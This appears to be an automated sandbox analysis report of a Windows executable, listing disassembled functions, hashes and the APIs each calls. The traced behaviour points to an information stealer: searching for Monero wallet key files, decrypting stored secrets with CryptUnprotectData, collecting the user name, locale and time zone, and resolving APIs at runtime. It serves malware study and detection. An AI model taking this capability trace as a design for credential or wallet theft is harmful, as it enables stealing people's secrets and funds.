API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: eba96c5156d68bf3cbffa3b03428c19be5a7ea39794016cb096844f8adb62e3d
Instruction ID: d659db19e73988e1cd4b0bdfd00bfeb0f6874654e81d227725c16d0d343a55ac
Opcode Fuzzy Hash: eba96c5156d68bf3cbffa3b03428c19be5a7ea39794016cb096844f8adb62e3d
Instruction Fuzzy Hash: 4F519771920208ABDF20DF90DC49BEE7778FB44701F5081A9BA05B71C0DB74AA99CF99

Function 00267B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

GetKeyboardLayoutList.USER32(00000000,00000000,002705AF), ref: 00267BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00267BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00267C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00267C62
LocalFree.KERNEL32(00000000), ref: 00267D22

Strings

/ , xrefs: 00267C7F

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 9d8baa2600b152cf7c5bfdda4b2bbbdc3826cdf66d9b2ab9fb4a033064a0e368
Instruction ID: 5d1e716d1170afb8fd8e8aeb47f3109ae7b5a81aec00fba1ba3dbfdba53db0d1
Opcode Fuzzy Hash: 9d8baa2600b152cf7c5bfdda4b2bbbdc3826cdf66d9b2ab9fb4a033064a0e368
Instruction Fuzzy Hash: 49414C71961218ABCB24DF94DC99BEEB3B8FF54704F204199E10A72190DB742F95CFA1

Function 0025E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00270D73), ref: 0025E4A2
StrCmpCA.SHLWAPI(?,002714F8), ref: 0025E4F2
StrCmpCA.SHLWAPI(?,002714FC), ref: 0025E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0025EBDF

Strings

\*.*, xrefs: 0025E44D

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 89b9a7952a20984bdf5406fc42dc3ea83be2247b533f76026ae1f47a2e5ade18
Instruction ID: 27639d4dd006539bfca909d13a7c3a3bf203dcc4d13a9835b4a0542e8eb8edf8
Opcode Fuzzy Hash: 89b9a7952a20984bdf5406fc42dc3ea83be2247b533f76026ae1f47a2e5ade18
Instruction Fuzzy Hash: 89122F719311189ADB19FB70DD96EEE7338AF54300F4045A9B50AB7091EE306FA9CF92

Function 00269600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0026961E
Process32First.KERNEL32(00270ACA,00000128), ref: 00269632
Process32Next.KERNEL32(00270ACA,00000128), ref: 00269647
StrCmpCA.SHLWAPI(?,00000000), ref: 0026965C
CloseHandle.KERNEL32(00270ACA), ref: 0026967A

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: cb77bfd2f54694002c074d5b3a3f8adc489b5ef3d448379791d6cdd620d8d7fa
Instruction ID: 202e7cdf032daeca55e218c567a7dca08bc627a870cf805dd8e5297783abc41a
Opcode Fuzzy Hash: cb77bfd2f54694002c074d5b3a3f8adc489b5ef3d448379791d6cdd620d8d7fa
Instruction Fuzzy Hash: 9C010C75A10308ABCB14DFA5CD48BEDB7FCEB58300F1041A9A90697240DB759BA0CF91

Function 00267A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D4E230,00000000,?,00270E10,00000000,?,00000000,00000000), ref: 00267A63
RtlAllocateHeap.NTDLL(00000000), ref: 00267A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D4E230,00000000,?,00270E10,00000000,?,00000000,00000000,?), ref: 00267A7D
wsprintfA.USER32 ref: 00267AB7

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: cfe15e25a4499ce55a2ed94c3abae66106ef92bcba59eb228fd53aa2de245ee1
Instruction ID: ee2017200d9a034204b9efdeaf538245fa20274e0222f6b17d3a1153eb6709f9
Opcode Fuzzy Hash: cfe15e25a4499ce55a2ed94c3abae66106ef92bcba59eb228fd53aa2de245ee1
Instruction Fuzzy Hash: B2117CB1A45218EBEB20DB54DC49FA9B778FB04721F1042AAE90A93280C7741E94CB91

Function 00259B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00259B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00259BA3
LocalFree.KERNEL32(?), ref: 00259BD3

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 4b792d42335c86386cb7ce588331ba7872eb9a592d205235985309f89e40b2e7
Instruction ID: 71ade7d8607c31c97fcf3af83bf6f20be7029d10e737d0451e09af5ad8a71634
Opcode Fuzzy Hash: 4b792d42335c86386cb7ce588331ba7872eb9a592d205235985309f89e40b2e7
Instruction Fuzzy Hash: 141109B8A0020AEFDB04DF94D985AAEB7B5FF88304F1045A9EC15A7350D770AE54CFA1

Function 00267850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002511B7), ref: 00267880
RtlAllocateHeap.NTDLL(00000000), ref: 00267887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0026789F

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 4f3013edb2756c5a320885f89cc20733e275a352fd1b37e3c73b47a5f3a1af0b
Instruction ID: 8a60597226e7dafade015d7162f87c5bc8c5d53a99eec3d717a26406de424de2
Opcode Fuzzy Hash: 4f3013edb2756c5a320885f89cc20733e275a352fd1b37e3c73b47a5f3a1af0b
Instruction Fuzzy Hash: 41F04FB1D44208EFC700DF99DD4ABAEBBB8EB05711F10026AFA05A3680C77459548BE1

Function 00251160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0025116A
ExitProcess.KERNEL32 ref: 0025117E

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 690bf22eba2ff05f400bc8c192c49708cb765868d975c42666c3ca43a995e266
Instruction ID: ad96a22ca0a3733457fc6936061278dda331a8d2dbf8a243ac5ba2ded7262843
Opcode Fuzzy Hash: 690bf22eba2ff05f400bc8c192c49708cb765868d975c42666c3ca43a995e266
Instruction Fuzzy Hash: 22D05E7490030CDBCB00DFE0D84A6DDBB78FB08322F0005A5DD0562340EA3098A5CAAA

Function 00269C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00D35750), ref: 00269C2D
GetProcAddress.KERNEL32(74DD0000,00D35770), ref: 00269C45
GetProcAddress.KERNEL32(74DD0000,00D49670), ref: 00269C5E
GetProcAddress.KERNEL32(74DD0000,00D49610), ref: 00269C76
GetProcAddress.KERNEL32(74DD0000,00D49688), ref: 00269C8E
GetProcAddress.KERNEL32(74DD0000,00D49640), ref: 00269CA7
GetProcAddress.KERNEL32(74DD0000,00D3B8D8), ref: 00269CBF
GetProcAddress.KERNEL32(74DD0000,00D4D140), ref: 00269CD7
GetProcAddress.KERNEL32(74DD0000,00D4D338), ref: 00269CF0
GetProcAddress.KERNEL32(74DD0000,00D4D3B0), ref: 00269D08
GetProcAddress.KERNEL32(74DD0000,00D4D368), ref: 00269D20
GetProcAddress.KERNEL32(74DD0000,00D357B0), ref: 00269D39
GetProcAddress.KERNEL32(74DD0000,00D35950), ref: 00269D51
GetProcAddress.KERNEL32(74DD0000,00D35850), ref: 00269D69
GetProcAddress.KERNEL32(74DD0000,00D35870), ref: 00269D82
GetProcAddress.KERNEL32(74DD0000,00D4D278), ref: 00269D9A
GetProcAddress.KERNEL32(74DD0000,00D4D3C8), ref: 00269DB2
GetProcAddress.KERNEL32(74DD0000,00D3B9A0), ref: 00269DCB
GetProcAddress.KERNEL32(74DD0000,00D35A50), ref: 00269DE3
GetProcAddress.KERNEL32(74DD0000,00D4D3E0), ref: 00269DFB
GetProcAddress.KERNEL32(74DD0000,00D4D1E8), ref: 00269E14
GetProcAddress.KERNEL32(74DD0000,00D4D200), ref: 00269E2C
GetProcAddress.KERNEL32(74DD0000,00D4D260), ref: 00269E44
GetProcAddress.KERNEL32(74DD0000,00D35890), ref: 00269E5D
GetProcAddress.KERNEL32(74DD0000,00D4D110), ref: 00269E75
GetProcAddress.KERNEL32(74DD0000,00D4D380), ref: 00269E8D
GetProcAddress.KERNEL32(74DD0000,00D4D290), ref: 00269EA6
GetProcAddress.KERNEL32(74DD0000,00D4D248), ref: 00269EBE
GetProcAddress.KERNEL32(74DD0000,00D4D128), ref: 00269ED6
GetProcAddress.KERNEL32(74DD0000,00D4D398), ref: 00269EEF
GetProcAddress.KERNEL32(74DD0000,00D4D1B8), ref: 00269F07
GetProcAddress.KERNEL32(74DD0000,00D4D2A8), ref: 00269F1F
GetProcAddress.KERNEL32(74DD0000,00D4D188), ref: 00269F38
GetProcAddress.KERNEL32(74DD0000,00D4A270), ref: 00269F50
GetProcAddress.KERNEL32(74DD0000,00D4D158), ref: 00269F68
